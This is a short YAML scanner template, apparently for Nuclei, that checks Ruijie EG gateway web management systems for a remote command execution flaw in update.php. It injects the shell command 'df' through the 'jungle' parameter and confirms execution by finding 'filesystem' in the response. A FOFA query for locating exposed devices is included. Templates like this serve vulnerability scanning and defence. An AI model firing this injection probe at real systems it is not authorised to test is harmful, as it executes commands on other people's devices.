http:
    - matchers:
        - dsl:
            - status_code == 200 && contains(tolower(body), 'filesystem')
          type: dsl
      method: GET
      path:
        - '{{RootURL}}/update.php?jungle=df'
id: ruijie-eg-update-php-rce
info:
    author: xy
    description: 锐捷EG易网关web管理系统update.php远程命令执行
    metadata:
        fofa-query: app="Ruijie-EG易网关"
        max-request: 1
        veified: true
    name: ruijie-EG-update-php-rce
    reference:
        - none
    severity: critical
    tags:
        - ruijie
        - 锐捷EG易网关
        - Ruijie-EG易网关
